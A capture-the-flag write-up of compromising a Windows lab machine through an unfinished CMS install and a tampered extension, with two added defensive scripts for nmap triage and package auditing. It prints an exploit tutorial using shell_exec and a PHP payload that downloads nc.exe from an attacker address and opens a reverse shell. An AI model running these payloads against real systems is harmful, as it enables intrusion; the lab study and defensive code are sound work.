Windows Life From Zero: Sam

And we silence those who talk loudly in the cinema

We take photos of those who piss, who piss in the streets

Before anything else, a rant about OffSec's official VPN: it is truly as bad as it gets. Even through a proxy, not being able to ping the target is the norm, and when the ping does get through, several hundred ms is the norm too. They just have to force you into using their own built-in Kali, huh.


Target IP: 192.168.61.248

Information gathering

nmap full port scan:

```
┌──(root㉿kali)-[/home/kali/Desktop]
└─# nmap -p- 192.168.61.248
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-07 08:57 UTC
Nmap scan report for 192.168.61.248
Host is up (0.00044s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
443/tcp open https
445/tcp open microsoft-ds
3306/tcp open mysql
7680/tcp open pando-pub
```

nmap detailed scan:

```
┌──(root㉿kali)-[/home/kali/Desktop]
└─# nmap -A -sV -sC -p80,443,445,3306,7680 192.168.61.248
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-07 09:09 UTC
Nmap scan report for 192.168.61.248
Host is up (0.00054s latency).

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.48 ((Win64) OpenSSL/1.1.1k PHP/7.3.29)
|_http-title: Sam Elliot | Web Designer
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29
443/tcp open ssl/http Apache httpd 2.4.48 ((Win64) OpenSSL/1.1.1k PHP/7.3.29)
|_http-title: Sam Elliot | Web Designer
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
3306/tcp open mysql MariaDB 10.3.24 or later (unauthorized)
7680/tcp open pando-pub?
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 10|11|2019 (97%)
OS CPE: cpe:/o:microsoft:windows_10 cpe:/o:microsoft:windows_11 cpe:/o:microsoft:windows_server_2019
Aggressive OS guesses: Microsoft Windows 10 1903 - 21H1 (97%), Microsoft Windows 10 1803 (95%), Microsoft Windows 11 (92%), Microsoft Windows 10 1909 (91%), Microsoft Windows 10 1909 - 2004 (91%), Windows Server 2019 (91%), Microsoft Windows 10 1809 (91%), Microsoft Windows 10 20H2 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2026-01-07T09:10:08
|_ start_date: N/A

TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 0.21 ms 192.168.49.1
2 0.50 ms 192.168.61.248

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 87.24 seconds
```
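The two scans above contain several things a defender would want flagged automatically rather than read by eye: the TRACE method enabled on both HTTP ports, a server certificate that expired in 2019, a database port reachable from the network, and SMB message signing that is enabled but not required. The script below is an added example written for this post (not a tool from the original) that parses this kind of nmap text output and produces exactly those findings; the sample report embedded in it is the post's own scan output, trimmed to the lines the parser looks at.

```python
"""Triage of an nmap -sV -sC text report: extract the open ports and flag the
findings a defender would follow up on. Added example for this post, not a
tool from the original; SAMPLE_REPORT is the post's own scan output, trimmed."""
import re
from datetime import datetime, timezone

SAMPLE_REPORT = """\
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.48 ((Win64) OpenSSL/1.1.1k PHP/7.3.29)
|_http-title: Sam Elliot | Web Designer
| http-methods:
|_ Potentially risky methods: TRACE
443/tcp open ssl/http Apache httpd 2.4.48 ((Win64) OpenSSL/1.1.1k PHP/7.3.29)
| http-methods:
|_ Potentially risky methods: TRACE
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
445/tcp open microsoft-ds?
3306/tcp open mysql MariaDB 10.3.24 or later (unauthorized)
7680/tcp open pando-pub?

Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
"""

# One nmap port-table row: "<port>/<proto> <state> <service> [<version>]"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


def triage(report, now=None):
    """Parse the report and return (ports, findings).

    ports    -- list of dicts: port, proto, state, service, version, and the
                NSE script lines printed under that port
    findings -- human-readable strings, one per condition worth following up
    """
    now = now or datetime.now(timezone.utc)
    ports, findings = [], []
    current = None                       # port entry the '|' lines belong to
    for raw in report.splitlines():
        line = raw.strip()
        m = PORT_RE.match(line)
        if m:
            current = {"port": int(m.group(1)), "proto": m.group(2),
                       "state": m.group(3), "service": m.group(4),
                       "version": m.group(5) or "", "scripts": []}
            ports.append(current)
            continue
        if line.startswith("Host script results"):
            current = None               # following '|' lines are host-level
            continue
        if not line.startswith("|"):
            continue
        text = line.lstrip("|_").strip()
        label = f"{current['port']}/{current['proto']}" if current else "host"
        if current:
            current["scripts"].append(text)
        if text.startswith("Potentially risky methods") and "TRACE" in text:
            findings.append(f"{label}: HTTP TRACE method enabled")
        elif text.startswith("Not valid after:"):
            expiry = datetime.fromisoformat(text.split(":", 1)[1].strip())
            expiry = expiry.replace(tzinfo=timezone.utc)
            if expiry < now:
                findings.append(f"{label}: TLS certificate expired on {expiry.date()}")
        elif "signing enabled but not required" in text:
            findings.append(f"{label}: SMB signing not required")
    # A database engine answering on a routable interface is a finding on its own.
    for p in ports:
        if p["service"] == "mysql":
            findings.append(f"{p['port']}/{p['proto']}: database server reachable over the network")
    return ports, findings


if __name__ == "__main__":
    ports, findings = triage(SAMPLE_REPORT)
    for p in ports:
        print(f"{p['port']}/{p['proto']:<4} {p['service']:<13} {p['version']}")
    print("\nFindings:")
    for f in findings:
        print(" -", f)
```

The parser keys on the fixed phrases nmap's `http-methods`, `ssl-cert` and `smb2-security-mode` scripts print, so it works on the plain `-oN` style text without needing the XML output; for anything beyond a handful of rules, `-oX` plus an XML parser is the more robust route.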

Visiting port 80 gives a web page.

dirsearch scan

SMB enumeration

```
nxc smb 192.168.61.248
SMB 192.168.61.248 445 SAMS-PC [*] Windows 10 / Server 2019 Build 19041 (name:SAMS-PC) (domain:Sams-PC) (signing:False) (SMBv1:False)
```

smbclient cannot log in anonymously.

```
smbclient -L //192.168.61.248
Password for [WORKGROUP\root]:
session setup failed: NT_STATUS_ACCESS_DENIED
```

However, the feroxbuster scan results exposed a CMS. A quick search turned up an RCE.

But a look at the related write-up shows you have to be logged in to use it, and I haven't found a password yet.

...... Looks like this CMS hasn't finished installing; I have to help install it before I can RCE.

The problem is that this CMS needs someone else's SQL database to install, which means I first have to set up MySQL on my own machine and have the CMS connect to it.

```
apt install mariadb-server -y
```

```
sudo systemctl enable --now mariadb
Synchronizing state of mariadb.service with SysV service script with /usr/lib/systemd/systemd-sysv-install.
Executing: /usr/lib/systemd/systemd-sysv-install enable mariadb
Created symlink '/etc/systemd/system/multi-user.target.wants/mariadb.service' → '/usr/lib/systemd/system/mariadb.service'.
```

```
┌──(root㉿kali)-[/home/kali/Desktop]
└─# sudo mysql
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 42
Server version: 11.8.5-MariaDB-3 from Debian -- Please help get to 10k stars at https://github.com/MariaDB/Server
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>
```

```
MariaDB [(none)]> CREATE DATABASE schlixdb;
Query OK, 1 row affected (0.000 sec)
MariaDB [(none)]> CREATE USER 'kaada'@'%' IDENTIFIED BY '123456';
Query OK, 0 rows affected (0.002 sec)
MariaDB [(none)]> GRANT ALL PRIVILEGES ON schlixdb.* TO 'kaada'@'%';
Query OK, 0 rows affected (0.002 sec)
MariaDB [(none)]> FLUSH PRIVILEGES;
Query OK, 0 rows affected (0.000 sec)
MariaDB [(none)]>
```

For this step you need to change the bind address in /etc/mysql/mariadb.conf.d/50-server.cnf to 0.0.0.0.

Afterwards, remember to open port 3306 on the firewall.

With everything set up, it should now look like this.

After countless hardships, finally.

Step three asks you for a domain name and a password; I just filled in something random here.

Finally, we can happily RCE.

```
==> Tutorial <==

1- Login with your account.
2- Go to the block management section. Directory is '/admin/app/core.blockmanager'.
3- Create a new category.
4- Download the 'mailchimp' extension from here. => https://github.com/calip/app_mailchimp
5- Open the 'packageinfo.inc' file. It is in '/blocks/mailchimp' directory.
6- Paste this PHP code below and save it.
#####################################
$command = shell_exec('netstat -an');
echo "<pre>$command</pre>";

?>
#####################################

7- Compress the file to ZIP and rename it 'combo_mailchimp-1_0_1'.
8- Install a package to created category and enter the installed 'mailchimp' extension.
9- Click the 'About' tab and our php code will be executed.

==> Vulnerable 'packageinfo.inc' file. (mailchimp Extension) <==
```

Note that you need to clone this repository directly.

One more reminder: what should be zipped is the entire folder under app_mailchimp. (Another guy got tripped up by this too.)

Finally.

Next comes the reverse shell; this damn machine is truly torturous.

```php
<?php
$name = 'mailchimp';
$type = 'block';
$guid = '860e9d79-c5d0-37e4-894e-cdc19d06c7c3';
$version = '1.0';
$license = 'MIT';
$description = 'Mailchimp Backdoor';
$author = 'Alip';
$url = 'https://github.com/calip/app_mailchimp';
$email = 'asalip.putra@gmail.com';
$copyright = 'Copyright &copy;2019 calip';

$command = shell_exec('mkdir c:\pwn && powershell.exe wget "http://192.168.49.61/nc.exe" -outfile "c:\pwn\nc.exe" && c:\pwn\nc.exe -e cmd.exe 192.168.49.61 4444');
echo "<pre>$command</pre>";

?>
```
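Both the exploit tutorial above and this packageinfo.inc rely on the same weakness: the CMS executes packageinfo.inc as PHP when the extension's About tab is rendered, so a file that should only declare metadata can carry arbitrary code. The script below is an added example for this post, not part of the CMS, of the exploit, or of the app_mailchimp repository. It shows the check a defender could run on an extension package before it is installed: every packageinfo.inc in the ZIP may contain only literal assignments, and any command execution or eval call is reported. The package layout (packageinfo.inc inside the extension folder) is taken from the post; the two sample packages are constructed in memory.

```python
"""Pre-install audit of a CMS extension package: open the ZIP, find every
packageinfo.inc in it and flag PHP that does more than declare metadata.
Added example for this post; not part of the CMS, the exploit, or the
app_mailchimp repository. Assumes what the post shows: one packageinfo.inc
per extension folder, holding only $var = 'literal'; assignments."""
import io
import re
import zipfile

# PHP calls that can run OS commands or evaluate code; none belong in metadata.
DANGEROUS = re.compile(
    r"\b(shell_exec|exec|system|passthru|popen|proc_open|pcntl_exec|eval|assert)\s*\(",
    re.IGNORECASE)

# The only statement shape a metadata file is expected to contain.
META_ASSIGN = re.compile(
    r"""^\$\w+\s*=\s*(?:'[^']*'|"[^"]*"|\d+(?:\.\d+)?|true|false|null)\s*;$""",
    re.IGNORECASE)


def audit_packageinfo(src):
    """Return a list of problems for one packageinfo.inc; empty means clean."""
    problems = []
    for lineno, raw in enumerate(src.splitlines(), 1):
        stmt = raw.strip()
        if stmt.startswith("<?php"):
            stmt = stmt[len("<?php"):].strip()
        if stmt.endswith("?>"):
            stmt = stmt[:-2].strip()
        if not stmt or stmt.startswith(("//", "#", "/*", "*")):
            continue
        m = DANGEROUS.search(stmt)
        if m:
            problems.append(f"line {lineno}: call to {m.group(1)}()")
        elif not META_ASSIGN.match(stmt):
            # Allowlist: anything that is not a plain literal assignment is suspect.
            problems.append(f"line {lineno}: unexpected statement: {stmt}")
    return problems


def audit_package(zip_bytes):
    """Audit every packageinfo.inc in a ZIP. Returns {path: [problems]} for
    files with problems; an empty dict means the package looks clean."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith("packageinfo.inc"):
                continue
            problems = audit_packageinfo(zf.read(name).decode("utf-8", "replace"))
            if problems:
                report[name] = problems
    return report


def build_package(files):
    """Construct an in-memory ZIP from {path: text}; used only for the samples."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for path, text in files.items():
            zf.writestr(path, text)
    return buf.getvalue()


# Constructed sample: a metadata file that only declares the extension.
CLEAN_PACKAGEINFO = """<?php
$name = 'mailchimp';
$type = 'block';
$version = '1.0';
$license = 'MIT';
$description = 'Mailchimp block';
?>
"""

# Constructed sample: the same file with the command execution the post's
# exploit tutorial pastes in.
BACKDOORED_PACKAGEINFO = """<?php
$name = 'mailchimp';
$type = 'block';

$command = shell_exec('netstat -an');
echo "<pre>$command</pre>";

?>
"""

if __name__ == "__main__":
    for label, info in (("clean", CLEAN_PACKAGEINFO), ("backdoored", BACKDOORED_PACKAGEINFO)):
        pkg = build_package({"mailchimp/packageinfo.inc": info})
        print(label, "->", audit_package(pkg) or "no problems found")
```

The allowlist rule matters more than the function blacklist: a payload that hides behind string concatenation or a variable function name will not match `DANGEROUS`, but it still is not a literal assignment and so is reported as an unexpected statement. Multi-line literals are also reported, which is the conservative side to err on for a file that is executed with the web server's privileges.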

Rummaging through files...... (rummage)

Found a few history records, and one of them seems to contain the administrator's password.

That's it.


http://example.com/2026/01/07/从零开始的windows生活-sam/
Author: Skyarrow
Posted on: January 7, 2026
Licensed under